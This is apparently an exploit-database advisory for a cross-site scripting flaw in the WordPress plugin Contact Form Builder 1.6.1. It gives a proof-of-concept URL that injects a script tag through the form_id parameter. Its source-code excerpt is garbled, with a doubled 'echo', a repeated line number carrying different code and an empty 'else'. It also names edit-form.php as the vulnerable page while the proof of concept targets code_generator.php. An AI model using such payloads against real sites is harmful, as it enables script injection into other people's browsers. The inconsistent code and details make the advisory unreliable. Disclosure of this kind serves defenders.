* Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Google Dork: N/A
* Date: 2020.03.23
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/contact-forms-builder/
* Software Link: https://wordpress.org/plugins/contact-forms-builder/
* Category : webapps
* Version: 1.6.1
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable page :
/edit-form.php
Vulnerable Source:
1094: echo echo $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
130: if(isset($_GET['form_id']))
1094: if(!empty($cancel_redirect_url)) else
POC :
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************